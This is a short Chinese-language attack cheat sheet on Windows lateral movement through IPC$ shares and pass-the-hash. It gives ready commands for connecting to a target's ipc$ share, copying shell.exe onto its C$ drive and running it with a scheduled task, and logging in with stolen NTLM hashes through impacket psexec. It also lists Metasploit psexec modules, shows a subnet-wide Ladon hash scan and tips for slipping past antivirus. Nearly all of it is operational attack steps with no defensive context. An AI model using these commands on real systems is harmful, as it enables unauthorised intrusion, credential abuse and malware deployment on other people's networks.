IPC攻击
IPC共享 管道命令 的资源,实现进程间的资源共享,可以进行命令执行
139:文件传输(2008以后弃用)
445:身份认证(主要)
说明 | |
---|---|
net use \\_ip\ipc$ _pass /user:_name |
建立连接 |
net use | 查看当前连接 |
使用 | 复制xxx到目标c盘www目录下: copy xxx \_ip\c$\www 常用命令 : dir、copy、at、move、rename dir \\_ip\c$ 查看c盘文件 net time \\_ip 查看时间 copy shell.exe \\_ip\c$\ 复制到c盘 at \\_ip 19:18:00 c:\shell.exe 计划任务 |
net share ipc$ /del |
删除连接 |
工具 | pstools 微软官方集成的命令工具集 psexec.exe /accepteula \\_ip 不弹窗执行IPC命令 |
哈希传递(PTH)
hash加密过程:明文 -> hex -> unicode -> md4
身份认证过程中,没有使用明文密码验证,而是hash验证,只要获取hash值,可以直接使用hash进行身份验证。
注意:2003和2008+的hash不同(相同明文加密方式不同,不可通用)
哈希登录工具:
cs、msf、impacket、mimikatz、ladon等
使用前提:
445处于开启状态(批量扫描445端口主机)
impacket(单个):
注:
cs中targets中右击也是单个传递(也可多选进行传递,但是会卡死,强烈不推荐!!!)
python版本:https://github.com/SecureAuthCorp/impacket
windows版本:https://github.com/maaaaz/impacket-examples-windows
使用:
psexec.exe _user:_pass@_ip cmd # 密码登录
psexec.exe -hashes _hash _user@_ip cmd # hash登录
注:
pth(pass the hash)限制 sid 501 administrator才可以hash登录
2003/xp/2008 没有kb2871997补丁 任何用户都可以进行pth
最后全部使用管理员账户的hash进行传递攻击
msf psexec模块
auxiliary/admin/smb/psexec_command # 执行单个命令的PTH模块
exploit/windows/smb/psexec # 执行直接就获取到meterpreter的PTH模块
exploit/windows/smb/psexec_psh # 支持对一个网段进行PTH进行验证的模块
Ladon
user.txt放用户名
pass.txt放32+32位hash
命令
shell c:\windows\Landon.exe 192.168.21.12/24 SmbHashScan
注意:
exe版本ladon大概率被杀软拦截,建议换成ps1的powershell版本
(user.txt和pass.txt设置与exe相同)
shell powershell.exe Import-Module Ladon7.ps1;Ladon smbhashscan